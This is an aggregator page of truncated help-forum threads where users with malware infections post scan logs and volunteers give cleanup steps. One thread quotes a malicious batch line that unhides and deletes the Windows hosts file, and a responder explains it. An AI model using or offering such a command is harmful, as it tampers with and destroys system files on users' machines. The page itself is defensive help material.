Tech Problem Aggregator

I think I got infected after unpacking a malicious file

Q: I think I got infected after unpacking a malicious file

HJT log removed as we analyze these only in the log forum and then only rarely. ~ OB

A: I think I got infected after unpacking a malicious file

Please describe the problems you are having with your computer so we can assist you better.

Please update MBAM and run a scan in Normal Mode and post the log in your reply as well.

Orange Blossom

Answer Match 64.68%

I'm very sorry, there was some sort of error when I posted this and it posted 3 times.
 
Full System Scan and Power Eraser by Norton came up with nothing. So I seem to have had it for a while, but it's just recently seemed to actually do something. It used to be that every now and then it redirects me, maybe around once every couple weeks, but now it's doing it quite often. It sometimes redirects and sometimes opens up a new page upon clicking something, as well as what I clicked on.
It's worth noting that I had previously been infected with Malicious File Download 12, I assume they're related. Here's the FRST log with addition in the attached files.
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 11-03-2015
Ran by Mason (administrator) on MASON-PC on 19-03-2015 02:03:55
Running from C:\Users\Mason\Desktop\FRST
Loaded Profiles: Mason (Available profiles: Mason)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
...

A:Infected With Malicious File Download 24

Hey,

Step 1: Adwarecleaner
Please download AdwCleaner (by Xplode) from the link below and save it to your Desktop:
Download Mirror #1
Right-click on AdwCleaner.exe and select Run as administrator. (If you have Windows XP then just run it)
Click Scan and let the scan run.
When it finishes, click Clean, following the on screen prompts
After your computer reboots, a log will open. Please Copy (Ctrl+C) and Paste (Ctrl+V) this into your next post.
Note: The log can also be found in here: C:\AdwCleaner\

Step 2: Malwarebytes
Download MalwareBytes Anti-Malware to your desktop.
Double-click mbam-setup-2.0.exe to start the installation of Malwarebytes Anti-Malware.
Follow the instructions on your screen to complete the installation. You can find the complete installation procedure here.
Click the Scan Now button, a threat scan will start automatically.
MalwareBytes Anti-Malware will now check for the latest updates. Click Update Now if new updates are available.
Your computer is now being scanned, please do not use your computer during the scan.
If no threats were found, click View detailed log.
Click Export and save the log as a .txt file on your Desktop or another location.
If the scan detected any threats, click Apply Actions. To complete any actions taken you will be prompted to restart your computer...click on Yes.
After reboot, start Malwarebytes Anti-Malware again and click the History Tab at the top and select Application Logs.
Check the box next to Scan Log. Choose the most current scan and click...

Answer Match 64.26%

Hi,

I've downloaded an ad-supported free full game, "Prince of Persia The Sands of Time", and its installation file doesn't work ("internal error").

How can I extract its content without using the installer?
 

A:Unpacking an EXE file

Answer Match 63.84%

Good evening,
I am having trouble with the Raila Virus that pops up a picture repeatedly and eventually reboots the computer. It also infects every flash disk entered into the system.
What I have done so far with no luck:
Downloaded, run and updated Avira Anti Virus
Downloaded and run Spybot
Downloaded and run McAfee Stinger (could only get build 3.8.0 as the link to the latest build gave me a 404 error)
Here is my log! Thanks!
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:46:07 PM, on 8/13/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Sygate\SPF\smc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\Explorer.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\spool\drivers\w32x86\3\hpztsb03.exe
C:\Program Files\Hewlett-Packard\OrderReminder\OrderReminder.exe
C:\Program Files\He...

A:Infected By Raila Virus (a Malicious 32 Bit Pe File)

Hello and welcome to BC
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. We aim to provide the valuable service known to come from BC to every member we can, but sometimes it takes just a little longer to get to every request for help.
If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine.
Upon completing the steps below a staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.
Thanks and again sorry for the delay.
Please see here for instructions how to install HijackThis and make a logfile. Save it into convenient location and include it to your next reply, please.
Next
Please do a scan with Kaspersky Online Scanner
Note: If you are using Windows Vista, open your browser by right-clicking on its icon and select 'Run as administrator' to perform this scan.
Click on the Accept button and install any components it needs.
The program will install and then begin downloading the latest definition files.
After the files have been downloaded on the left side of the page in the Scan section select My Computer
This will start the program and scan your system.
The scan will take a while, so b...

Answer Match 48.72%

I was infected by AntiVirus Studio 2010 a few days ago. After some research, I was able to remove it with MalwareBytes Anti-Malware. Since then, my browsers have been hijacked -- all search results get redirected. My OS is MS Vista, SP1.
To date, I've run
MalwareBytes Anti-Malware
SuperAntiSpyware
rkill
ComboFix
DDS
GMER
For combofix, I ran it with the following script file in the same directory:
File::
c:\windows\system32\winupdate.exe
c:\windows\system32\winhelper.dll
c:\windows\system32\AVR09.exe
c:\Program Files\AdvancedVirusRemover\PAVRM.exe
My combofix and DDS logs are attached.
I was never able to complete a GMER scan without crashing even though I followed all instructions very carefully.
Thanks to boopme for guidance in getting to this point.
Any help greatly appreciated.
Many thanks, Bo Lasater
I have a Sony Vaio, model VGN FZ4000. I still have the problem.
Thanks, Bo
EDIT: Posts merged ~BP

A:Infected with malicious Redirect

Hello and welcome to Bleeping Computer
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.
Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.
We need to create an OTL Report
Please download OTL from one of the following mirrors:
This is THE Mirror
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
In the custom scan box paste the following:

msconfig
safebootminimal
activex
drivers32
netsvcs
%SYSTEMDRIVE%\*.exe
/m...

Answer Match 48.72%

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:35:36, on 29/08/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal
Running processes:
C:\Windows\System32\smss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\winlogon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware\aawservice.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskeng.exe
c:\Program Files\BT\ISecP\App\syssvcnt.exe
C:\Windows\system32\svc...

A:Infected With Various Malicious Software

Hi cthires
I apologize for the delay in response to your thread.
If you have since resolved the original problem you were having, I would appreciate you letting us know. If not please post a new HJT log so I can see the current condition of your system.
Thanks.

Answer Match 48.3%

I'm truly dealing with the malware from hell. It has been an intermittent problem over the last 5-6 years. I get rid of it for a year or so then it comes back and it is a nightmare to get rid of it every time. It is definitely the same infection.
It has a rootkit component and a Trojan component. The trojan is now being detected as Trojan.Gen by numerous scanners. The rootkit is always just identified as "unknown rootkit". The rootkit component infects the MBR of any type of storage (HD, Flash drive, SD cards). Previously, Comodo Cleaning Essentials was the only thing that could get rid of the MBR infection. Now nothing will. Does anyone have any suggestions? I'm just thinking about throwing everything out at this point.
I tried overwriting the MBR of the flashdrives with dd but GParted cannot write a new partition table now and it sees the storage as only a few mb in size. I'm pretty sure that this worked in the past.
The malware also uses malicious Chrome Extensions to maintain persistence. I'm finding hidden extensions when I scan with FRST. They're random letter/number names. These just appear randomly within a few hours after re-installing Windows. I always re-install and rewrite the MBR because NOTHING can fully remove this. Lol, burning the HD doesn't seem too extreme at this point.
Is there any way to block Chrome from installing any extensions at all? I don't really need any extensions. It's just weird that they keep coming back - especially since I haven't l...

A:Malicious Chrome Extensions/Infected MBR

Your router may also be infected.
 
Take note of your ISP login information, disconnect from the internet and then hard reset your router. Before re-attaching it to the external network change the admin and network passwords (with your freshly installed Windows machine).
 
To be sure there aren't any hidden persistent partitions on your HDD before re-installing Windows you can "0 fill" it (completely erase) with Seatools for DOS. This will well and truly hose any information on it.

Answer Match 48.3%

.
DDS (Ver_2011-08-26.01) - NTFSAMD64
Internet Explorer: 9.0.8112.16421
Run by CHRIS at 21:23:06 on 2011-11-24
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.1977.917 [GMT 3:00]
.
AV: AntiVir Desktop *Enabled/Updated* {090F9C29-64CE-6C6F-379C-5901B49A85B7}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: AntiVir Desktop *Enabled/Updated* {B26E7DCD-42F4-63E1-0D2C-6273CF1DCF0A}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\Program Files (x86)\Adobe\Photoshop Elements 7.0\PhotoshopElementsFileAgent.exe
C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\Apple...

A:Infected with system fix malicious malware

Hello and Welcome to the forums! My name is Gringo and I'll be glad to help you with your computer problems.
Some things to remember while we are working together.
Do not run any other tool until instructed to do so!
Please do not attach logs or put in code boxes.
Tell me about any problems that have occurred during the fix.
Tell me of any other symptoms you may be having as these can help also.
Do not run anything while running a fix.
Do not run any other tool until instructed to do so!
Click on the Watch Topic Button and select Immediate Notification and click on proceed, this will help you to get notified faster when I have replied and make the cleaning process faster.
Please print out or make a copy in Notepad of any instructions given, as sometimes it is necessary to go offline and you will lose access to them.
Run Combofix:
You may be asked to install or update the Recovery Console (Win XP Only) if this happens please allow it to do so (you will need to be connected to the internet for this)
Before you run Combofix I will need you to turn off any security software you have running. If you do not know how to do this you can find out >here< or >here<
Combofix may need to reboot your computer more than once to do its job, this is normal.
You can download Combofix from one of these links.
Link 1
Link 2
Link 3
1. Close any open browsers or any other programs that are open.
2. Close/disable all anti virus and anti malware programs so they do not interfere with the r...

Answer Match 48.3%

Hello, this is actually my first post in this forum. I am basically facing a problem, and I think my computer is infected with a malicious program. I scanned with Malwarebytes anti-malware twice and I found multiple malicious programs that have been eventually quarantined. I also did an online scan - Result was satisfying as no virus has been found. The first time I scanned with online scan it found a malicious program. I was so happy after the last online scan.. But my other software 'Anti Trojan Elite' said that it found a trojan in my computer - I don't know if it is a coincidence but it says that every time I: Want to use 'Open with..' - Want to open control panel... Please help me resolve this problem. I use windows XP (ofc).

A:My computer is infected with some sort of malicious..

Post the MBAM (Malwarebytes anti-malware) log.

Answer Match 48.3%

Here's the story

Recently, I sent my laptop to a computer shop to repair my laptop.
After I got it back, it seems that my "Action Center" is turned off, "Firewall" is at off and my "Windows Update" is turned off.
Then I quickly install "Malwarebytes Anti-Malware" & "BitDefender Anti-Virus" and turned on all those stuff which is at off mode.
After running "Malwarebytes Anti-Malware" I got this

http://i.imgur.com/P2MYXTb.png

My question is

- Is it safe to delete them?
- Is "Malwarebytes Anti-Malware" & "BitDefender Anti-Virus" enough to protect my laptop?

[Last edit: 16/02/2013 - Typo error]
 

A:[HELP] On malicious file

Answer Match 48.3%

I have a malicious file that I tried removing through HijackThis and I'm unable to get rid of it. The file is located Crogam Files. The hijack program calls it babe.dat... Any ideas about this?
 

A:malicious file

Answer Match 48.3%

Alright,
I downloaded a PDF file a few minutes ago. I was already wary of this file, and decided to play it safe and run it sandboxed. I downloaded it and went to the directory. This is where it went wrong. I accidentally double clicked it and ran the file.

As expected, nothing (not even adobe pdf reader) opened up. I knew I was in big trouble. I decided to run the file sandboxed and see what changes it made to my machine.

In C:\Program Files (x86)\Common Files\Adobe\SLCache it created a file called 'QUNDRVNTX0NIRUNL.slc'.
In User\Current\AppData\Local\Temp it created a file called amt3. It seemed like some sort of a log. I have included it in the attachments below.

It also created a multitude of registry files. I took a screen shot of them;

I tried running regedit and searching for those files, but to no avail. I found a suspicious program in the startup programs in RegEdit called (Default) - it had no value. I tried doing a system restore to a few days back and I don't think it resolved anything. Here is the DDS log;
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 9.0.8112.16455 BrowserJavaVersion: 10.9.2
Run by Junaid at 19:39:49 on 2012-12-02
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.8154.6366 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
AV: Microsoft Security Essentials *Enabled/Updated* {B140BF4E-23BB-4198-90AB-A51A4C60A69C}
SP: Microsoft Security Essentials *Enabled/Updated...

Answer Match 48.3%

Hello everyone. This is my first time here and maybe you have already answered this but I can't find anything related.
My problem is that I'm getting the message "malicious file 24 attack" and I'm constantly redirected to advertisings and spam pages.
Norton cannot solve this. 
Is there anything I can do to fix this?
 
Thanks in advance for all your help.

A:malicious file 24

Hello, and to BC.
Please follow the instructions below. If you do not understand anything, feel free to stop and ask.
Security Check by screen317
Download Security Check by screen317 from here or here.
Save it to your Desktop.
Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
A Notepad document should open automatically called checkup.txt. Please copy and paste the contents of the log in your next reply.
===
AdwCleaner by Xplode
Please download AdwCleaner by Xplode and save to your Desktop.
Double click on AdwCleaner.exe to run the tool.
Vista/Windows 7/8 users right-click and select Run As Administrator
The tool will start to update the database, please wait a bit.
Click on I agree button.
Click on the Scan button.
AdwCleaner will begin...be patient as the scan may take some time to complete.
After the scan has finished, ensure that all items are checked and click on the Cleaning button.
AdwCleaner will ask to reboot to finish cleaning.
A log will open when the system finishes rebooting. Please copy and paste the contents of that logfile in your next reply.
A copy of all logfiles is saved in the C:\AdwCleaner folder which was created when running the tool.
===
Junkware Removal Tool
Please download Junkware Removal Tool to your desktop.
Disable all your antivirus and antimalware software - see how to do that here.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select...

Answer Match 48.3%

How do you delete a file when it says it is being used by another person or program?
 

A:Malicious file?

Answer Match 47.88%

I've downloaded a large application (Quicken) in .rar format. I extracted it with Winrar and now I have 18 tidy little bundles of 15mb each in the intended directory. Bad news is I haven't the faintest idea what to do with them now. There aren't any .exe or installation files as far as I can see--just those 18 bundles. Can anyone straighten me out?
 

A:Unpacking .rar

Answer Match 47.88%

I'm trying to install Renaissance Starter Edition, but the program just unpacks the files somewhere, and doesn't actually start the installation routine. I tried it at work, and it started installing, but on my PC at home, it unpacks the files, then nothing. It goes that fast, I don't know what the files are, or where it's put them. Any suggestions?
 

Answer Match 47.88%

I am running Windows XP. I have installed several new programs over the past couple of weeks. I have Malwarebytes' Anti-Malware and have the IP protection enabled. I also have Avira AntiVir Personal - Free Antivirus and keep them updated. I have been having an issue with my computer being very slow and freezing up over the past couple of weeks. Every time I attempt to open a new site or start IE, it prompts and states it has blocked access to a malicious IP = 95.211.1.176 (it is 80% of the time this IP, but sometimes it is another one; can't remember it though). Also, when I run IE, Avira will alert me stating it has detected a "pattern of the HTML/Infected.WebPage.Gen.HTML script virus" and I will quarantine this. This has alerted me on sites such as Google, eBay, eBates and others. I am unsure what is going on. I have gone into my Windows\Temp folder and have found "Perflib_Perfdata_34c" which is unable to delete due to it "being used by another program." Also, Malwarebytes' has found several items that it has quarantined, and I would list them right now, but I am running a full scan and can't access the quarantine files. I don't really see anything different in the task manager, but I am not sure. Avira and Malwarebytes' don't find anything during scans. I also have TuneUp Utilities 2009 and try to keep my computer "cleaned up" through the workings of that program as well. I am unsure this has anything t...

A:Malwarebytes keeps blocking access to a malicious IP... Am I infected?

Update mbam and run a FULL scan
Please post the results
-------------------------------
ATF
Please download ATF Cleaner by Atribune & save it to your desktop.
Double-click ATF-Cleaner.exe to run the program.
Under Main "Select Files to Delete" choose: Select All.
Click the Empty Selected button.
If you use Firefox browser click Firefox at the top and choose: Select All
Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.
If you use Opera browser click Opera at the top and choose: Select All
Click the Empty Selected button.
If you would like to keep your saved passwords, please click No at the prompt.
Click Exit on the Main menu to close the program.
Note: On Vista, "Windows Temp" is disabled. To empty "Windows Temp" ATF-Cleaner must be "Run as an Administrator".
------------------------------------
SAS, may take a long time to scan
Please download and scan with SUPERAntiSpyware Free
Double-click SUPERAntiSpyware.exe and use the default settings for installation.
An icon will be created on your desktop. Double-click that icon to launch the program.
If asked to update the program definitions, click "Yes". If not, update the definitions before scanning by selecting "Check for Updates". (If you encounter any problems while downloading the updates, manually download them from here. Double-click on the hyperlink for Download Installer and save SASDEFINITIONS.EXE to your desktop. ...

Answer Match 47.88%

I get the message:
"Bit Defender has blocked a potentially malicious or infected application"

The application apparently is part of the Microsoft Windows Operating System:
C:\Windows\System 32\svchost.exe

Bit Defender blocks it and I'm not sure I can allow it because of previous problems involving blue screens and stop errors. Dell support was unable to help me, as a matter of fact they made things worse by uninstalling a video adapter and then installing one meant for Vista on my XP laptop. So, I restored to a previous point and haven't seen a blue screen since but it's only been a week or so. I also uninstalled McAfee which came with the computer and installed Bit Defender which still has some life from the previous computer. That's when I started getting the above message. Neither McAfee or Bit Defender found anything wrong with malware or spyware.
Normally, I would allow the program to run since you would think a new computer would not have a corrupted operating system, but because one of the techs at Dell suggested that that was the problem with my blue screens and the fact that I haven't been able to use the delete key since day one and that the delete key works in safe mode. According to him, 2/3 of the time it's due to spyware. They want me to restore the computer to its original day one status. It took me two days to get all my programs and stuff moved from the old computer, so I'm not really too anxious to start all ove...

A:Potentially malicious or infected application says Bit Defender

Answer Match 47.88%

Hi,

I'm a consultant, with a client that received an email with a suspicious link. I was able to download the html file from the redirected site without running it, and took a look at it in a text editor. It's obviously specially crafted, but it's beyond my ability to decipher. Could anyone interpret the file to figure out what the payload is supposed to be?

It's a 191K file, and I'm not sure how best to attach it. If someone could let me know, I'd appreciate it.

Thanks in advance,

Charlie T.

A:Likely malicious html file - can someone take a look?

You can upload it here. Please put it in a .zip archive first.

Answer Match 47.88%

Hi,

For years I've been running my HP desktop with ZoneAlarm but no permanently-on AV program - just doing regular scans with Panda Security or House Call AV. I've been very careful not to open suspicious emails or visit any "dubious" websites, and I've been ok ...until recently.

Well, I guess it was going to happen eventually. I visited a respectable looking website (well, maybe not *so* respectable: a real estate agent!) and ZA announced that wpv831252894422.exe wanted to access the net...

I tried a number of AV tools to get rid of the infection:

***Panda
- found and disinfected ndis.sys (W32/Protector.A?)
- labeled as suspicious reader_s.exe (trojan.neprodoor?)

***Kaspersky Virus Removal Tool
- detected reader_s (Win32.FraudLoad.fpt?)
- detected wpv[?].exe (Win32.Bredolab.zy?)
- detected JS.Agent.anr
- detected Win32.Protector.b
- detected ikowin32.exe

***Avira found nothing

***Norton AV found nothing

***Malwarebytes
- found and removed wiaserva.log
- found and removed reg.key AG Protect

And now it seems I'm left with:

***Kaspersky AV 2010
detects HEUR:Trojan.Win32.Generic (C:\WINDOWS\Temp\wpv831252894422.exe) and quarantines the file, but then detects it again - about every 2 hours, in fact.

I don't know how to get rid of this, but I wonder if the problem's somehow linked to one of several instances of svchost.exe on the machine. I remember reading somewhere that Bredolab can modify svchost.exe.

I'd really appreciat...

A:Malicious file wpv831252894422.exe

Hello and welcome to Bleeping Computer
We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.
If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. Please include a clear description of the problems you're having, along with any steps you may have performed so far.
Please refrain from running tools or applying updates other than those we suggest while we are cleaning up your computer. The reason for this is so we know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
Even if you have already provided information about your PC, we need a new log to see what has changed since you originally posted your problem.
Please download OTL from following mirror:
This is THE Mirror
Save it to your desktop.
Double click on the icon on your desktop.
Click the "Scan All Users" checkbox.
Push the button.
Two reports will open, copy and paste them in a reply here:
OTL.txt <-- Will be opened
Extra.txt <-- Will be minimized
In the upper right hand corner ...

Answer Match 47.88%

I was just checking around system performance-config file etc. and noticed this strange file called bigdog.exe. So I checked a few forums and noticed that it's a spyware first spotted or perhaps originated in China and then it was spotted in a few European nations.
So personally I removed it as I hate to have any useless file on my computer. It was under the c:\windows directory (just type bigdog.exe on the search tab and you will see where it is located)

A:malicious file ! (bigdog.exe)

The file "bigdog.exe" is known to be created under the following filenames:
%System%\bigdog.exe
%Temp%\dogok\bigdog.exe
c:\bigdog.exe

Answer Match 47.88%

Hello, a person has sent me a .bat file telling me it's a game. I have opened the file in my text editor, it contained this line:

@Echo off cd Windows/system32/drivers/etc attrib hosts -r -h del hosts

Can someone tell me what would this do exactly, and how pissed should I be with that person?

Thanks in advance.
 

A:A Bat file, most probably malicious - Question

You should be very pissed off at the person, since this is a batch file - clearly not a game - and the command removes the Read-Only and Hidden attributes of the Hosts file, and then attempts to delete said file. However, they've screwed it up and it wouldn't work properly anyway. That's not the point, though.
 

Answer Match 47.46%

Hello,

Yesterday I downloaded windows.iso via the Media Creation Tool (it took 8 hours!!). I clicked it today to unpack its contents and failed because an error message told me that there is no program associated with it. I panicked and associated it with Windows Media Player but am scared stiff to use it or do anything. Can anyone help please?

Herefordian

A:Unpacking windows.iso

Hi,

You can use the free program 7-zip to extract iso (and other) files: 7-Zip

Answer Match 47.46%

Hello everyone
It's been a long time since I wrote an article in MA but I decided to explore some important concepts to analyze malware.

"Understanding packers and detecting a packed file" is a topic treated by @kram7750 in this thread: http://malwaretips.com/threads/malw...ng-packers-and-detecting-a-packed-file.42356/

I will talk about unpacking.
The manual unpacking is definitely the most complex to learn. Although a malware can be sometimes much more difficult by a packer, it is much easier to explain the theory behind a malware, rather than explain the operation of a packer. This is primarily due to two reasons. First, you need to have unpacking knowledge of a wider number of arguments: it is not enough to understand the machine code and know that debugging. In addition, the term "packer" is very generic. Packers implement all sorts of anti-reversing techniques and even an entire book would suffice to explain them all in detail.

I will try to make myself understood even by those who don't have a clue what a packer is. However, it is useless to deny that you have to engage, and not just to see this introduction. Do not confuse, even if there are other threads, this article represents the real end of our route. If you include the following, all the rest you'll learn without difficulty and it will update your knowledge base package. Here, we define the article on manual unpacking the culmination of knowledge. To write this introd...

More replies
Answer Match 47.46%

I recently ordered a new PC from ironsidecomputers and it didn't work when I plugged it in. I later pulled the front connectors loose, replugged them and was able to get it running, but the reset powered it on, power button reset the system. I was happy, but the PC was in the wrong spot, so I turned it off and put it where it needed to be, and nothing. I tried all other outlets, then the one that worked previously, but nothing. I referred to the manual and it seemed the original setup was wrong, but I'm not getting it to work in the right setup. What am I doing wrong? Is it just a power problem? I would be talking to tech but it's the weekend. Motherboard is ASRock Z97 Pro3, Intel Core i5 4590 processor, EVGA 500 watt, NVIDIA GeForce GTX 750 Ti graphics card, 8 ram, Win 10, Enermax Thorax case

A:PC has no power after unpacking

Sounds to me like the front panel connection is hooked up wrong, which could do some damage to the system over time. If you're not comfortable taking it apart and reconnecting all of it, I'd wait and take it back to the place where you bought it and have them look at it and fix it.

1 more replies
Answer Match 47.46%

She's using 8.1. She tells me she found something indicating "remote monitoring software" and it's capable of disabling and even remaining undetected by some antiviruses. It disabled her Kaspersky and Windows Defender.
 
I believe she spread it to her computer using a compromised USB (she is a beginner when it comes to computers and has ruined many computers before realizing that she's used an infected USB that spreads to uninfected computers).
 
She went to malwaretips.com to treat her computer, but she was unable to come to a resolution. She ruined one of her computers by calling Geek Squad and doing some unknown thing (to me) over the phone (which was like pouring oil on a forest fire). She's scared that she may ruin her roommate's computer as well, and thus I am here trying to find a resolution to her problem.
 
She has scanned with FRST and Zoek. I have the files that she uploaded if needed. There is also some Chinese/Eastern font
 
http://imgur.com/4SHlHUo
 
This is the file she showed me and she has another in her history. The people at malwaretips say her computer isn't infected, but there is something going on. Her old computer was a breeding ground for viruses and I highly doubt she would not accidentally spread it to her roommate's computer by sharing a USB. Her roommate's computer was brand new and it suddenly began behaving strangely... there must be some way to find out what's wrong with it.
 
 
Edit: She... Read more

A:My friend's computer is infected with some unknown malicious program(s).

Hello ..
If you need more assistance with any malware infection, other advanced tools are available but they cannot be used in this forum. Please follow the instructions in the Malware Removal and Log Section Preparation Guide starting at Step 6.
If you cannot complete a step, then skip it and continue with the next.
In Step 6 there are instructions for downloading and running FRST which will create two logs.
When you have done that, post your logs in the Virus, Trojan, Spyware, and Malware Removal Logs forum, NOT here, for assistance by the Malware Response Team only.
Start a new topic, give it a relevant title and post your log(s) along with a brief description of your problem, a summary of any anti-malware tools you have used and a summary of any steps that you have performed on your own.
If you cannot produce any of the required logs... start the new topic anyway. Explain that you followed the Prep. Guide, were unable to create the logs, and describe what happened when you tried to create them, then describe your problem. A member of the Malware Removal Team will walk you through, step by step, on how to clean your computer.

After doing this, please reply back in this thread with a link to the new topic so we can close this one, so any unwanted advice will not be posted.
 
Thank You
 

6 more replies
Answer Match 47.46%

Hello,
I have been fighting this virus for 2 days. It has blocked my Task Manager and cmd, and Folder Options is disabled. If I open any site in Internet Explorer, it is redirected to some other page that says 'This site is blocked'. The same thing happens even in Safe Mode. The virus continuously prompts saying that 'The system detected a potential hazard. Click here to download the official intrusion detection system'. I was able to run a rootrepeal scan on the infected system. I have attached the log.
The virus didn't let me run the dds.scr script since the script tries to open command prompt.
Please help me.

A:Infected with some malicious virus - taskmgr, cmd, explorer blocked

Please help me. I'm new here and followed the instructions on how to post a new topic. I've also attached the rootrepeal log file. Not sure why nobody is replying to this post.

4 more replies
Answer Match 47.46%

Hi. I ran Kaspersky a bit back and it notified me of malicious software/programs on my computer. The computer is a Windows XP and it has been running slow for a while now.

Below is my Hijack This Log. Any help would be appreciated.



A:Infected Computer - Running Slow With Malicious Programs, Help!

6 more replies
Answer Match 47.46%

Hello again!

As I had an EXCELLENT experience with Gringo the last time around, I thought I'd stop back with my next project.

This is a Dell Inspiron 530 desktop running Windows 7 Professional, 32-bit. This is one of the main computers at a small business. I mention this because it includes some programs not normally found on personal computers I've worked on in the past. This includes Dyn Updated, Quickbooks, Intuit Data Backup, to name a few. I figure this might make it a bit more difficult when navigating around while we clean.

Here's what I know: Computer was infected about 4-5 days ago after the user received a malicious email from a sender claiming to be UPS or Fedex. The email attachment claimed to have information about a package that would be dropped off or picked up (the user isn't sure which), and you needed to open and print the attached "receipt" to receive your package.

This installed one of the fake "security" suites that has been removed earlier this morning. I feel like there is still a rootkit hanging on somewhere, and aswMBR seemed to detect something pertaining to Microsoft Security Essentials (the entry was highlighted in RED) RIGHT before Windows bluescreened with an IRQ_NOT_LESS_OR_EQUAL error or something of the sort. Logs are attached below, and I eagerly await your advice. Nothing will be done until I am instructed to do so.

DDS.TXT is below, the other two are attached.

**EDIT: I also have a screenshot o... Read more

A:Infected - User opened UPS malicious email attachment

Greetings and Welcome back to The Forums!!
Here are the things to keep in mind while I am helping you to make things go easier and faster for both of us:
Please do not run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Please do not attach logs or use code boxes, just copy and paste the text.
Due to the high volume of logs we receive it helps to receive everything in the same format, and code boxes make the logs very difficult to read. Also, attachments require us to download and open the reports when it is easier to just read the reports in your post.
Please read every post completely before doing anything.
Pay special attention to the NOTE: lines, these entries identify an individual issue or important step in the cleanup process.
Please provide feedback about your experience as we go.
A short statement describing how the computer is working helps us understand where to go next, for example: I am still getting redirected, the computer is running normally, etc. Please do not describe the computer as "the same", this requires the extra step of looking back at your previous post.
NOTE: At the top of your post, click on the Watch Topic Button, select Immediate Notification, and cli... Read more

16 more replies
Answer Match 47.46%

